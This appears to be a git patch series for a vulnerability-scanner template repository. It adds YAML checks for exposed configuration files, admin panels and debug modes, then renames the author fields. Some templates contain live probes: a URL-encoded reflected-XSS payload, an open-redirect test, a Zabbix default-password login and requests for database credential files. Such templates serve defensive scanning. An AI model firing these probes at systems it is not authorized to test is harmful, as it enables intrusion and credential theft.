+  - method: GET
+    path:
+      - '{{BaseURL}}/Dockerrun.aws.json'
+    matchers:
+      - type: word
+        words:
+          - 'AWSEBDockerrunVersion'
+          - 'containerDefinitions'
+        condition: and
\ No newline at end of file
diff --git a/exposures/configs/ansible-config-disclosure.yaml b/exposures/configs/ansible-config-disclosure.yaml
new file mode 100755
index 0000000000..a07e675fbb
--- /dev/null
+++ b/exposures/configs/ansible-config-disclosure.yaml
@@ -0,0 +1,17 @@
+id: ansible-config-disclosure
+
+info:
+  name: Ansible Configuration Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ansible.cfg'
+    matchers:
+      - type: word
+        words:
+          - '[defaults]'
+          - '[inventory]'
+        condition: and
\ No newline at end of file
diff --git a/exposures/configs/opcache-status-exposure.yaml b/exposures/configs/opcache-status-exposure.yaml
new file mode 100644
index 0000000000..26b0fd5a75
--- /dev/null
+++ b/exposures/configs/opcache-status-exposure.yaml
@@ -0,0 +1,20 @@
+id: opcache-status-exposure
+
+info:
+  name: OPcache Status Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/opcache-status/"
+      - "{{BaseURL}}/php-opcache-status/"
+      - "{{BaseURL}}/opcache-status/opcache.php"
+    matchers:
+      - type: word
+        words:
+          - "<th>opcache_enabled</th>"
+          - "<th>opcache_hit_rate</th>"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposures/configs/perl-status.yaml b/exposures/configs/perl-status.yaml
new file mode 100755
index 0000000000..6e65332db7
--- /dev/null
+++ b/exposures/configs/perl-status.yaml
@@ -0,0 +1,17 @@
+id: perl-status
+
+info:
+  name: Apache mod_perl Status Page Exposure
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/perl-status'
+    matchers:
+      - type: word
+        words:
+          - "<title>Apache2::Status"
+          - "Perl version"
+        condition: and
\ No newline at end of file
diff --git a/exposures/configs/rails-database-config.yaml b/exposures/configs/rails-database-config.yaml
new file mode 100644
index 0000000000..4461c3b86b
--- /dev/null
+++ b/exposures/configs/rails-database-config.yaml
@@ -0,0 +1,18 @@
+id: rails-database-config
+
+info:
+  name: Ruby-on-Rails Database Configuration Exposure
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/database.yml"
+    matchers:
+      - type: word
+        words:
+          - "adapter:"
+          - "database:"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposures/configs/symfony-database-config.yaml b/exposures/configs/symfony-database-config.yaml
new file mode 100755
index 0000000000..b116547087
--- /dev/null
+++ b/exposures/configs/symfony-database-config.yaml
@@ -0,0 +1,18 @@
+id: symfony-database-config
+
+info:
+  name: Symfony Database Configuration Exposure
+  author: Ice3man
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/config/databases.yml"
+    matchers:
+      - type: word
+        words:
+          - "class:"
+          - "param:"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposures/configs/symfony-profiler.yaml b/exposures/configs/symfony-profiler.yaml
new file mode 100644
index 0000000000..6b7b9d5810
--- /dev/null
+++ b/exposures/configs/symfony-profiler.yaml
@@ -0,0 +1,18 @@
+id: symfony-profiler
+
+info:
+  name: Symfony Profiler
+  author: ice3man
+  severity: high
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
+    matchers:
+      - type: word
+        words:
+          - "<title>Symfony Profiler</title>"
+          - "symfony/profiler/"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposures/logs/rails-debug-mode.yaml b/exposures/logs/rails-debug-mode.yaml
new file mode 100644
index 0000000000..f696b5ce6c
--- /dev/null
+++ b/exposures/logs/rails-debug-mode.yaml
@@ -0,0 +1,18 @@
+id: rails-debug-mode
+
+info:
+  name: Rails Debug Mode Enabled
+  author: ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610"
+    matchers:
+      - type: word
+        words:
+          - "Rails.root:"
+          - "Action Controller: Exception caught"
+        condition: and
+        part: body
\ No newline at end of file
diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml
new file mode 100644
index 0000000000..0ec3c41f8e
--- /dev/null
+++ b/exposures/logs/struts-debug-mode.yaml
@@ -0,0 +1,17 @@
+id: struts-debug-mode
+
+info:
+  name: Apache Struts setup in Debug-Mode
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/'
+    matchers:
+      - type: word
+        words:
+          - "<debug>"
+          - "<struts.actionMapping>"
+        condition: and
\ No newline at end of file
diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml
new file mode 100755
index 0000000000..0efc1b2c65
--- /dev/null
+++ b/misconfiguration/airflow-api-exposure.yaml
@@ -0,0 +1,17 @@
+id: airflow-api-exposure
+
+info:
+  name: Apache Airflow API Exposure / Unauthenticated Access
+  author: Ice3man
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/experimental/latest_runs'
+    matchers:
+      - type: word
+        words:
+          - '"dag_run_url":'
+          - '{"items":['
+        condition: and
\ No newline at end of file
diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml
new file mode 100644
index 0000000000..825453b763
--- /dev/null
+++ b/misconfiguration/hadoop-unauth.yaml
@@ -0,0 +1,17 @@
+id: hadoop-unauth
+
+info:
+  name: Apache Hadoop Unauth
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/ws/v1/cluster/info'
+    matchers:
+      - type: word
+        words:
+          - 'hadoopVersion'
+          - 'resourceManagerVersionBuiltOn'
+        condition: and
\ No newline at end of file
diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml
new file mode 100755
index 0000000000..5a5e4e8ef5
--- /dev/null
+++ b/vulnerabilities/other/acme-xss.yaml
@@ -0,0 +1,20 @@
+id: acme-xss
+
+info:
+  name: ACME / Let's Encrypt Reflected XSS
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
+    matchers:
+      - type: word
+        words:
+          - "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain&#x29;</x:script>"
+      - type: word
+        words: 
+          - "/xml"
+          - "/html"
+    matchers-condition: and
\ No newline at end of file
diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml
new file mode 100644
index 0000000000..cef9244755
--- /dev/null
+++ b/vulnerabilities/other/aspnuke-openredirect.yaml
@@ -0,0 +1,15 @@
+id: aspnuke-openredirect
+info:
+  name: ASP-Nuke Open Redirect
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
\ No newline at end of file
diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
new file mode 100755
index 0000000000..ddc7fc4c4c
--- /dev/null
+++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
@@ -0,0 +1,19 @@
+id: yarn-resourcemanager-rce
+
+info:
+  name: Apache Yarn ResourceManager RCE
+  author: Ice3man
+  severity: low
+
+requests:
+  - method: POST
+    path:
+      - '{{BaseURL}}/ws/v1/cluster/apps/new-application'
+    matchers:
+      - type: word
+        words:
+          - 'application-id'
+      - type: status
+        status:
+          - 200
+    matchers-condition: and
\ No newline at end of file

From a52ffe5c4e07e8b7b4a997373d17f32df6c78aef Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Sun, 10 Jan 2021 19:45:36 +0530
Subject: [PATCH 30/85] fixes and updates

---
 cves/2017/CVE-2017-9506.yaml                           | 2 +-
 cves/2018/CVE-2018-7251.yaml                           | 2 +-
 cves/2018/CVE-2018-8006.yaml                           | 2 +-
 cves/2019/CVE-2019-10092.yaml                          | 2 +-
 cves/2019/CVE-2019-14223.yaml                          | 3 ++-
 cves/2019/CVE-2019-7219.yaml                           | 2 +-
 cves/2019/CVE-2019-9955.yaml                           | 2 +-
 cves/2020/CVE-2020-1943.yaml                           | 2 +-
 default-logins/activemq/activemq-default-login.yaml    | 2 +-
 default-logins/ambari-default-credentials.yaml         | 2 +-
 default-logins/ofbiz-default-credentials.yaml          | 2 +-
 default-logins/zabbix-default-credentials.yaml         | 7 +++++--
 exposed-panels/active-admin-exposure.yaml              | 2 +-
 exposed-panels/activemq-panel.yaml                     | 2 +-
 exposed-panels/adminer-exposure.yaml                   | 2 +-
 exposed-panels/airflow-exposure.yaml                   | 2 +-
 exposed-panels/ambari-exposure.yaml                    | 2 +-
 exposed-panels/ansible-tower-exposure.yaml             | 2 +-
 exposed-panels/couchdb-exposure.yaml                   | 2 +-
 exposed-panels/couchdb-fauxton.yaml                    | 2 +-
 exposed-panels/django-admin-panel.yaml                 | 2 +-
 exposed-panels/druid-console-exposure.yaml             | 2 +-
 exposed-panels/exposed-pagespeed-global-admin.yaml     | 2 +-
 exposed-panels/exposed-webalizer.yaml                  | 2 +-
 exposed-panels/flink-exposure.yaml                     | 2 +-
 exposed-panels/hadoop-exposure.yaml                    | 2 +-
 exposed-panels/kafka-connect-ui.yaml                   | 2 +-
 exposed-panels/kafka-monitoring.yaml                   | 2 +-
 exposed-panels/kafka-topics-ui.yaml                    | 2 +-
 exposed-panels/kubernetes-dashboard.yaml               | 2 +-
 exposed-panels/rocketmq-console-exposure.yaml          | 2 +-
 exposed-panels/selenoid-ui-exposure.yaml               | 2 +-
 exposed-panels/setup-page-exposure.yaml                | 2 +-
 exposed-panels/solr-exposure.yaml                      | 2 +-
 exposed-panels/yarn-manager-exposure.yaml              | 2 +-
 exposed-panels/zipkin-exposure.yaml                    | 2 +-
 exposures/apis/swagger-api.yaml                        | 2 +-
 exposures/configs/airflow-configuration-exposure.yaml  | 2 +-
 exposures/configs/amazon-docker-config-disclosure.yaml | 2 +-
 exposures/configs/ansible-config-disclosure.yaml       | 2 +-
 exposures/configs/git-config.yaml                      | 2 +-
 exposures/configs/opcache-status-exposure.yaml         | 2 +-
 exposures/configs/perl-status.yaml                     | 2 +-
 exposures/configs/rails-database-config.yaml           | 2 +-
 exposures/configs/symfony-database-config.yaml         | 2 +-
 exposures/configs/symfony-profiler.yaml                | 2 +-
 exposures/logs/rails-debug-mode.yaml                   | 2 +-
 exposures/logs/struts-debug-mode.yaml                  | 2 +-
 misconfiguration/airflow-api-exposure.yaml             | 2 +-
 misconfiguration/hadoop-unauth.yaml                    | 2 +-
 vulnerabilities/other/acme-xss.yaml                    | 2 +-
 vulnerabilities/other/aspnuke-openredirect.yaml        | 3 ++-
 vulnerabilities/other/yarn-resourcemanager-rce.yaml    | 2 +-
 53 files changed, 59 insertions(+), 54 deletions(-)

diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml
index 0224932158..9106898094 100644
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@@ -2,7 +2,7 @@ id: CVE-2017-9506
 
 info:
   name: Jira IconURIServlet SSRF
-  author: Ice3man
+  author: pd-team
   severity: high
   description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
 
diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml
index cf0487f22b..c5dbe3dde3 100644
--- a/cves/2018/CVE-2018-7251.yaml
+++ b/cves/2018/CVE-2018-7251.yaml
@@ -2,7 +2,7 @@ id: CVE-2018-7251
 
 info:
   name: AnchorCMS Error Log Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml
index bcf53c36ba..a8d25e7428 100644
--- a/cves/2018/CVE-2018-8006.yaml
+++ b/cves/2018/CVE-2018-8006.yaml
@@ -2,7 +2,7 @@ id: CVE-2018-8006
 
 info:
   name: Apache ActiveMQ XSS
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml
index 1531fab12e..db7cdb6215 100644
--- a/cves/2019/CVE-2019-10092.yaml
+++ b/cves/2019/CVE-2019-10092.yaml
@@ -2,7 +2,7 @@ id: CVE-2019-10092
 
 info:
   name: Apache mod_proxy HTML Injection / Partial XSS
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml
index d0fca33dbf..8406ec8b67 100644
--- a/cves/2019/CVE-2019-14223.yaml
+++ b/cves/2019/CVE-2019-14223.yaml
@@ -1,7 +1,8 @@
 id: CVE-2019-14223
+
 info:
   name: Alfresco Share Open Redirect
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
index 3aa09e4f66..6fbcfa0e23 100644
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -2,7 +2,7 @@ id: CVE-2019-7219
 
 info:
   name: Zarafa WebApp Reflected XSS
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
index d10d7f49b7..ba1718a61a 100644
--- a/cves/2019/CVE-2019-9955.yaml
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -2,7 +2,7 @@ id: CVE-2019-9955
 
 info:
   name: CVE-2019-9955 Zyxel XSS
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml
index 764f723364..6f7d1d6a1d 100644
--- a/cves/2020/CVE-2020-1943.yaml
+++ b/cves/2020/CVE-2020-1943.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-1943
 
 info:
   name: Apache OFBiz Reflected XSS
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index c6546895c8..fb1f8264f8 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -2,7 +2,7 @@ id: activemq-default-login
 
 info:
   name: Apache ActiveMQ Default Credentials
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari-default-credentials.yaml
index fe461837dd..2f3c715a24 100755
--- a/default-logins/ambari-default-credentials.yaml
+++ b/default-logins/ambari-default-credentials.yaml
@@ -2,7 +2,7 @@ id: ambari-default-credentials
 
 info:
   name: Apache Ambari Default Credentials
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz-default-credentials.yaml
index 8f9d9c1374..cd855650ed 100755
--- a/default-logins/ofbiz-default-credentials.yaml
+++ b/default-logins/ofbiz-default-credentials.yaml
@@ -2,7 +2,7 @@ id: ofbiz-default-credentials
 
 info:
   name: Apache OfBiz Default Credentials
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix-default-credentials.yaml
index 5202d88398..7bbdf1d241 100755
--- a/default-logins/zabbix-default-credentials.yaml
+++ b/default-logins/zabbix-default-credentials.yaml
@@ -2,7 +2,7 @@ id: zabbix-default-credentials
 
 info:
   name: Zabbix Default Credentials
-  author: Ice3man
+  author: pd-team
   severity: critical
 
 requests:
@@ -13,10 +13,13 @@ requests:
       - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
       - X-Requested-With: XMLHttpRequest
     body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "zabbix.php?action=dashboard.view"
+
       - type: status
-        status: 302
\ No newline at end of file
+        status:
+          - 302
\ No newline at end of file
diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml
index 0654ef10c2..75933eb847 100755
--- a/exposed-panels/active-admin-exposure.yaml
+++ b/exposed-panels/active-admin-exposure.yaml
@@ -2,7 +2,7 @@ id: active-admin-exposure
 
 info:
   name: ActiveAdmin Admin Dasboard Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml
index 9265ab0e96..7038f3640f 100755
--- a/exposed-panels/activemq-panel.yaml
+++ b/exposed-panels/activemq-panel.yaml
@@ -2,7 +2,7 @@ id: activemq-panel
 
 info:
   name: Apache ActiveMQ Exposure
-  author: Ice3man
+  author: pd-team
   severity: info
 
 requests:
diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml
index 1e0a0e3326..265940f3ea 100755
--- a/exposed-panels/adminer-exposure.yaml
+++ b/exposed-panels/adminer-exposure.yaml
@@ -2,7 +2,7 @@ id: adminer-exposure
 
 info:
   name: Adminer Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml
index b02e422796..f4693188bc 100755
--- a/exposed-panels/airflow-exposure.yaml
+++ b/exposed-panels/airflow-exposure.yaml
@@ -2,7 +2,7 @@ id: airflow-exposure
 
 info:
   name: Apache Airflow Exposure / Unauthenticated Access
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml
index b44f058832..aa2121f3d5 100644
--- a/exposed-panels/ambari-exposure.yaml
+++ b/exposed-panels/ambari-exposure.yaml
@@ -2,7 +2,7 @@ id: ambari-exposure
 
 info:
   name: Apache Ambari Exposure / Unauthenticated Access
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml
index 11de49fcfc..0ef45ced7f 100644
--- a/exposed-panels/ansible-tower-exposure.yaml
+++ b/exposed-panels/ansible-tower-exposure.yaml
@@ -2,7 +2,7 @@ id: ansible-tower-exposure
 
 info:
   name: Ansible Tower Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml
index 68942ed1f2..46fbac50a7 100755
--- a/exposed-panels/couchdb-exposure.yaml
+++ b/exposed-panels/couchdb-exposure.yaml
@@ -2,7 +2,7 @@ id: couchdb-exposure
 
 info:
   name: Apache CouchDB Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml
index f5d9d52103..00135ebf18 100755
--- a/exposed-panels/couchdb-fauxton.yaml
+++ b/exposed-panels/couchdb-fauxton.yaml
@@ -2,7 +2,7 @@ id: couchdb-fauxton
 
 info:
   name: Apache CouchDB Fauxton Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml
index 30dc04e6c4..17d2cbf5b8 100644
--- a/exposed-panels/django-admin-panel.yaml
+++ b/exposed-panels/django-admin-panel.yaml
@@ -2,7 +2,7 @@ id: django-admin-panel
 
 info:
   name: Python Django Admin Panel
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml
index fd70fd8bf0..b0cc838eed 100755
--- a/exposed-panels/druid-console-exposure.yaml
+++ b/exposed-panels/druid-console-exposure.yaml
@@ -2,7 +2,7 @@ id: druid-console-exposure
 
 info:
   name: Alibaba Druid Console Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml
index 568072f374..827b030430 100755
--- a/exposed-panels/exposed-pagespeed-global-admin.yaml
+++ b/exposed-panels/exposed-pagespeed-global-admin.yaml
@@ -2,7 +2,7 @@ id: exposed-pagespeed-global-admin
 
 info:
   name: Apache PageSpeed Global Admin Dashboard Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml
index 21f33ad15a..e7cbd72b58 100644
--- a/exposed-panels/exposed-webalizer.yaml
+++ b/exposed-panels/exposed-webalizer.yaml
@@ -2,7 +2,7 @@ id: exposed-webalizer
 
 info:
   name: Publicly exposed Webalizer Interface
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml
index 155c090b58..e8cee03f5c 100755
--- a/exposed-panels/flink-exposure.yaml
+++ b/exposed-panels/flink-exposure.yaml
@@ -2,7 +2,7 @@ id: flink-exposure
 
 info:
   name: Apache Flink Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml
index efefde4127..83df2717f3 100755
--- a/exposed-panels/hadoop-exposure.yaml
+++ b/exposed-panels/hadoop-exposure.yaml
@@ -2,7 +2,7 @@ id: hadoop-exposure
 
 info:
   name: Apache Hadoop Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml
index 973910c087..687c26364e 100755
--- a/exposed-panels/kafka-connect-ui.yaml
+++ b/exposed-panels/kafka-connect-ui.yaml
@@ -2,7 +2,7 @@ id: kafka-connect-ui
 
 info:
   name: Apache Kafka Connect UI Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml
index c6d4183b66..326b562280 100755
--- a/exposed-panels/kafka-monitoring.yaml
+++ b/exposed-panels/kafka-monitoring.yaml
@@ -2,7 +2,7 @@ id: kafka-monitoring
 
 info:
   name: Apache Kafka Monitor Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml
index 8e4a823e28..288fffdaa1 100755
--- a/exposed-panels/kafka-topics-ui.yaml
+++ b/exposed-panels/kafka-topics-ui.yaml
@@ -2,7 +2,7 @@ id: kafka-topics-ui
 
 info:
   name: Apache Kafka Topics UI Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml
index b50e6d4155..341bd3be10 100644
--- a/exposed-panels/kubernetes-dashboard.yaml
+++ b/exposed-panels/kubernetes-dashboard.yaml
@@ -2,7 +2,7 @@ id: kubernetes-dashboard
 
 info:
   name: Kubernetes Console Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml
index 26c5fe99bc..4ba0f94f82 100755
--- a/exposed-panels/rocketmq-console-exposure.yaml
+++ b/exposed-panels/rocketmq-console-exposure.yaml
@@ -2,7 +2,7 @@ id: rocketmq-console-exposure
 
 info:
   name: Apache RocketMQ Console Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/selenoid-ui-exposure.yaml b/exposed-panels/selenoid-ui-exposure.yaml
index 4742cd906d..69752f1412 100755
--- a/exposed-panels/selenoid-ui-exposure.yaml
+++ b/exposed-panels/selenoid-ui-exposure.yaml
@@ -2,7 +2,7 @@ id: selenoid-ui-exposure
 
 info:
   name: Selenoid UI Dashboard Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml
index a2903098fe..8263823b24 100755
--- a/exposed-panels/setup-page-exposure.yaml
+++ b/exposed-panels/setup-page-exposure.yaml
@@ -2,7 +2,7 @@ id: setup-page-exposure
 
 info:
   name: Zenphoto Setup Page Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
   description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
 
diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml
index 21f878068d..eeb98e2544 100755
--- a/exposed-panels/solr-exposure.yaml
+++ b/exposed-panels/solr-exposure.yaml
@@ -2,7 +2,7 @@ id: solr-exposure
 
 info:
   name: Apache Solr Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposed-panels/yarn-manager-exposure.yaml b/exposed-panels/yarn-manager-exposure.yaml
index bb17c90f1d..dfa85796e6 100755
--- a/exposed-panels/yarn-manager-exposure.yaml
+++ b/exposed-panels/yarn-manager-exposure.yaml
@@ -2,7 +2,7 @@ id: yarn-manager-exposure
 
 info:
   name: Apache Yarn ResourceManager Exposure / Unauthenticated Access
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml
index 4a0e2b1646..c8b60f1cfa 100755
--- a/exposed-panels/zipkin-exposure.yaml
+++ b/exposed-panels/zipkin-exposure.yaml
@@ -2,7 +2,7 @@ id: zipkin-exposure
 
 info:
   name: Zipkin Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml
index b02f519310..8692b19eae 100644
--- a/exposures/apis/swagger-api.yaml
+++ b/exposures/apis/swagger-api.yaml
@@ -2,7 +2,7 @@ id: swagger-apis
 
 info:
   name: Swagger API Panel
-  author: Ice3man
+  author: pd-team
   severity: info
 
 requests:
diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml
index 6bbb2fe2ce..8a8eef4c0d 100755
--- a/exposures/configs/airflow-configuration-exposure.yaml
+++ b/exposures/configs/airflow-configuration-exposure.yaml
@@ -2,7 +2,7 @@ id: airflow-configuration-exposure
 
 info:
   name: Apache Airflow Configuration Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml
index 3dc66d5530..09a6a75bd0 100755
--- a/exposures/configs/amazon-docker-config-disclosure.yaml
+++ b/exposures/configs/amazon-docker-config-disclosure.yaml
@@ -2,7 +2,7 @@ id: amazon-docker-config-disclosure
 
 info:
   name: Dockerrun AWS Configuration Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposures/configs/ansible-config-disclosure.yaml b/exposures/configs/ansible-config-disclosure.yaml
index a07e675fbb..5492ef2c7d 100755
--- a/exposures/configs/ansible-config-disclosure.yaml
+++ b/exposures/configs/ansible-config-disclosure.yaml
@@ -2,7 +2,7 @@ id: ansible-config-disclosure
 
 info:
   name: Ansible Configuration Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml
index de93c88ba0..30149315e8 100644
--- a/exposures/configs/git-config.yaml
+++ b/exposures/configs/git-config.yaml
@@ -2,7 +2,7 @@ id: git-config
 
 info:
   name: Git Config Disclosure
-  author: Ice3man & pikpikcu
+  author: pd-team & pikpikcu
   severity: medium
   description: Searches for the pattern /.git/config on passed URLs.
 
diff --git a/exposures/configs/opcache-status-exposure.yaml b/exposures/configs/opcache-status-exposure.yaml
index 26b0fd5a75..cfcad72853 100644
--- a/exposures/configs/opcache-status-exposure.yaml
+++ b/exposures/configs/opcache-status-exposure.yaml
@@ -2,7 +2,7 @@ id: opcache-status-exposure
 
 info:
   name: OPcache Status Exposure
-  author: Ice3man
+  author: pd-team
   severity: low
 
 requests:
diff --git a/exposures/configs/perl-status.yaml b/exposures/configs/perl-status.yaml
index 6e65332db7..b19c7cbce7 100755
--- a/exposures/configs/perl-status.yaml
+++ b/exposures/configs/perl-status.yaml
@@ -2,7 +2,7 @@ id: perl-status
 
 info:
   name: Apache mod_perl Status Page Exposure
-  author: Ice3man
+  author: pd-team
   severity: medium
 
 requests:
diff --git a/exposures/configs/rails-database-config.yaml b/exposures/configs/rails-database-config.yaml
index 4461c3b86b..a957dc27f2 100644
--- a/exposures/configs/rails-database-config.yaml
+++ b/exposures/configs/rails-database-config.yaml
@@ -2,7 +2,7 @@ id: rails-database-config
 
 info:
